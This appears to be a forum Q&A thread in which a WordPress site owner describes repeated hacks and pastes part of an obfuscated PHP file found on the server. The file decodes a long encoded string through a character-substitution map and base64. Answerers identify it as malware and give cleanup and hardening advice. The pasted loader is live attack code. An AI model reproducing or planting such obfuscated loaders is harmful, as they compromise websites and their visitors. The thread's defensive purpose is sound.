# Corrupted file on my ftp server in my wordpress site

Tags: javascript, php, wordpress, ftp

I'm in charge of Wordpress website. 1 year ago, the site had has been hacked. When someone connected on the site by typing the url, he was redirected to another "fake" site. I discovered that a line was simply in the index.php to redirect to another site. I removed the line and made a restoration of my ftp server. Before that i noticed some susicious files on the ftp server, i did not created these file, and there was some obscure php and js code, with some random char.

Recently the site had the same problem unless there was only a blank page when we connect on the site. I restored again the site. Before that i noticed some suspicious files on the ftp server, i did not created these file, and there was some obscure php and js code in it, with some random char.

All the files had almost the same date of vreation and i had no right to delete them from the server. I think that the vulnerabilities come from here but i can't find any similar case on the internet. Do someone have information about it ? I'm just looking for some information know and i don't have access to the site at the moment.

EDIT:

I have this kind of file :

```
    <?php
$vHMX55W = Array('1'=>'C', '0'=>'j', '3'=>'U', '2'=>'x', '5'=>'F', '4'=>'s', '7'=>'q', '6'=>'P', '9'=>'T', '8'=>'y', 'A'=>'5', 'C'=>'e', 'B'=>'G', 'E'=>'f', 'D'=>'a', 'G'=>'1', 'F'=>'2', 'I'=>'7', 'H'=>'m', 'K'=>'X', 'J'=>'n', 'M'=>'c', 'L'=>'E', 'O'=>'v', 'N'=>'M', 'Q'=>'i', 'P'=>'Q', 'S'=>'g', 'R'=>'O', 'U'=>'A', 'T'=>'I', 'W'=>'h', 'V'=>'N', 'Y'=>'S', 'X'=>'t', 'Z'=>'6', 'a'=>'3', 'c'=>'Z', 'b'=>'w', 'e'=>'R', 'd'=>'k', 'g'=>'9', 'f'=>'z', 'i'=>'J', 'h'=>'4', 'k'=>'V', 'j'=>'D', 'm'=>'0', 'l'=>'d', 'o'=>'u', 'n'=>'W', 'q'=>'8', 'p'=>'b', 's'=>'l', 'r'=>'Y', 'u'=>'K', 't'=>'H', 'w'=>'r', 'v'=>'L', 'y'=>'p', 'x'=>'o', 'z'=>'B');
function v9PSABL($vMCS1QU, $vDG7FSU){$v4ZU9QC = ''; for($i=0; $i < strlen($vMCS1QU); $i++){$v4ZU9QC .= isset($vDG7FSU[$vMCS1QU[$i]]) ? $vDG7FSU[$vMCS1QU[$i]] : $vMCS1QU[$i];}
return base64_decode($v4ZU9QC);}
$vW073GA = 'DnrxDKVfcKPxi5g9ekinekTyuPyI1SddKGV53sc53s4J3LWPKGV59Lr'.
'JKYUgT1TOT04S1SddKGV53sc53s4J3dkV9Ge5Km5Le5TJKYUgT1T2N0MoN1hbv0LQRbxiDn'.
'rxTnkXMteAu1eE3mkYkdkYn8lTk5ePKGWEedgYkm5YeLkLKmc63QlluYdu1K4u1PddKGV53sc53s4JY5'.
'e335grKmc63slz3de5e5gB9GTJKYUgT1T2N0MoN1hbv0LQRbxiEPyg1SyycQWyMaVsl1SdKmci9Lk9uYduCbxicHg8cn50D1S'.
'dKmci9Lk9TB5fT1ewcKdS69hSiBcypB3y1SsI1SdiDnrxTKVmMJzOM8SdcHs4ck4JpH5XcYllv1UQvHybc8TyuPxi1K4u1PdiiBc'.
'ypBkornGsTjmSrn2mcKiEpn50MHgfu1eHDn2sn8lornGsiGmyRbxi1PddcHs4cnAWpn3S6YzolnGEpn50MHgfu1eHDn2spH5XcYd'.
'I1Sdi1YeHDn2spH5XcYUgTtWolnGEpn50MHgfu1eHDn2spH5XcYdI1Sdi1YeEedsNekVp'.
'iBXsCkGpTHAWpn3QKYUgT1eHDn2spH5Xc94u1Psg1Ssg1Jmu1PyHlnA0lBsOpQz0lKVmp'.
'FGEMae8DKzElB5JM8SdlBkhl1duCbxST1USitesCtPS6YzfltiyM5gmrnlfu1'.
'emcKWmv1UJ6BL+i8dI1SxST1USitesCtPS6YzfltiEMHkbpB50cYSQ6BLSDtisc0GMTQT4T1ipT1T4T1emcKWmu94uT1UST1e'.
'mcKWmTjmSMae8KaisMB2WrF3xT0bOr9hQv1UQTQbSitesCtPyRbxST1USitesCtPS6Yzflti'.
'EMHkbpB50cYSQK1T+TQbSTQzlT1T4T1emcKWmu94u1QUST1z8cKeGMHhSi'.
'tesCtPI1Jmu1HcGpHVmDngoTBsfKFsbu1efltTyTt4uT1z8cKeGMHhSMtiscGgXrKe0D1S'.
'QvGhxnfLXRkGqnfLXRkGpN1mAKKb2nfUXRkGpN1mAKKb8nfUXV5GpN1'.
'mAKKb8Vk4bv9kluYWMvQWpN1mAKK2pNYmAKk4bv9slEj5pN1mAKk4bv9slEjipN1mmKk4bv9slEjTGnf'.
'UXVkmyuK4fEYPOTQbdMae8u94uEPxucJkoraeypFhScJiOpkgxpaVmu1e0pFAmcnAmuPyI1SxST1USi'.
'BWOMaPS6YzbMHkJKaisMB2WrF3xi8gCutlala2HltUyK1hODYM4i8'.
'M4P1eE3mkYkdkYn8lTk5ePKmW63GPJKYdI1SxST1USDnrSuBsfKFsbu1expaVmuYduT1UST'.
't4uT1UST1UST1z8cKeGMHhSiBVOpJespJPI1QUST1zg1QUST1UuT1UST1empFXspJNS6YzsCtz4pFesu1iUTQbSiBVOpJespJPy'.
'RbxuT1UST1e0pFAmcnAmTjmSiteODFkoMG4bKYUoT1iUTQUoT1exp'.
'aVmT1hST0hQRbxuT1USTtisltk8pQUdrFgolBkolj4uEPxucJkoraeypFhSrn2mcKiEpn50MHgfu1e0pFAmcn'.
'AmuPyI1QUST1zbMHkJKFGWlBVxKF54p1SJTa4xvQxyEYVkDYM4T1e0pFAmcnAmv1Udpn5mr'.
'FWsM8dI1SxST1UScHg8u1eyTjmSNj4SiBdS61z0pakol1Sdpn5mrFWsMG'.
'42KYdIT1eyu84y1QUST1zI1SxST1UST1UST1eoM8UgTBkhMB2OcB3xTJbQv1Udpn5mrF'.
'WsMG42Kk4dDkmyRbxST1UST1UST1e0NQUgTBVOlnAmu1eoM8dI'.
'1QUST1UST1USitiWpHPS6Yz8rnAdujU4T1SdrfTSvYU2uYdI1QUST1UST1USiBVOpJespJPS6Yz'.
'fltiEMHkbpB50cYSQC8ToiBGWlBVxcKVpNkGpiBslvQigTQbSiBAfn8'.
```

someone know what it is ?

Comment: Contact hosting provider and ask them to delete.If your site gets hacked frequently you should seriously check for loopholes in your site and server.I would suggest you change hosting provider.

Answer (score 1, accepted):

This is incredibly broad. There are literally millions of possible vectors for attack on a website. The fact that you were attacked does not in itself suggest any one of those possibilities over any other.

Since you have a timestamp when the attack occurred, check server logs at that time for clues about the vector. Was there SFTP access at that time? Perhaps a legitimate user's password is compromised. Was there HTTP access at that time? Perhaps a plugin has a vulnerability and needs to be disabled or upgraded.

An attacker only needs one vulnerability to gain access to the site. It may be obvious which it was (e.g., if you see SFTP activity from a known user account), or it may take extensive research to figure out what happened and how.

Comment: if i remember well, i checked the SMTP logs and i saw some emails like mohammedTheHacker@whatevermail.com. I checked the HTTP logs, specially looking for the POST request if i could find where and when the corrupted file was uploaded but i found nothing relevant. How could i proceed to have more information from the logs ?

Comment: If there's nothing in HTTP logs, check other logs: SFTP, SSH, general system logs... If there was no HTTP activity at the time you can rule it out. (If there was HTTP activity at the time, even if it looked innocuous, perhaps the mechanism to generate the breach was planted earlier in order to be triggered with an innocuous request.)

Comment: i see ty, and do you know anything about he file content i edited ?

Comment: The file is the attack itself. It's just the obfuscated script that generates the ads or intercepts the passwords or exploits the server to send spam, or whatever. You can spend a lot of time deciphering it piece by piece (in such a way as to not risk executing it), but ***what*** the attackers chose to do on your server ultimately matters a lot less than ***how*** they did it.

Comment: Thanks a lot for yours answer this is very instructive. Do you guess that theses files (becasue there is lika a hundred of them of the server) are the attack ? Or you are sure about it because you know this kind of attack.

Comment: Files like that are an extremely common form of attack. There's no legitimate reason to create obfuscated PHP like that; ergo there's no possibility someone uploaded those files to your server out of kindness. Whatever they do, it isn't something you want happening.

Answer (score 1):

It's very simple: you got hacked.

Forget trying to deobfuscate the php files; they may tell you what the files do, but they won't tell you *how* the files got there. Delete them all.

And you won't find the exploit vector unless you carefully parse server logs and check all your plugins and theme for vulnerabilities. And the vector could have been malware on your own PC/mac that stole credentials.

The fix is simple: carefully clean the site and the hosting account by following [FAQ My site was hacked - WordPress Codex.](https://codex.wordpress.org/FAQ_My_site_was_hacked) Scan your own PC/Mac and any machine that was used to access WordPress admin and the hosting account.

If this is you own server, you need to harden it, too. Try searching https://serverfault.com/ for information on your OS and how to secure and harden it.

And take a look at the recommended security measures for WordPress itself in [Hardening WordPress - WordPress Codex](https://codex.wordpress.org/Hardening_WordPress) and [Brute Force Attacks - WordPress Codex](http://codex.wordpress.org/Brute_Force_Attacks)

Answer (score 0):

When you say you have no right to delete them, aren't you managing the site?  If you do not have full administrative rights, you should contact whoever does and explain the situation so that they may handle it immediately, or at least enable you to do so.

Do you know how the site was hacked the first and second time?  Obviously there is a vulnerability that needs to be addressed.

What kind of files were left behind?  Can you examine/explain the contents any further than finding 'obscure' code?

Comment: When i say i have no rigth to delete them i mean the files had the 001 permission. I had to first change the permission mode then delete it. Yes i have the full administrative rigths. No i don't know how the site was hacked the second time, i don't even know it was hacked the first time. I will upload the kind of file that was left behind later. I don't have the acces to it rigth now.